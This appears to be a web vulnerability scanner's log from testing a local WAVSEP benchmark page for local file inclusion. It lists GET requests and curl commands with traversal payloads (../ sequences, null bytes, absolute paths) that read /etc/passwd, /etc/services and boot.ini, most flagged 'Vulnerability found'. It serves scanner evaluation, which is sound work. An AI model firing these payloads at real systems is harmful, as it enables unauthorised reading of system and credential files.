GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

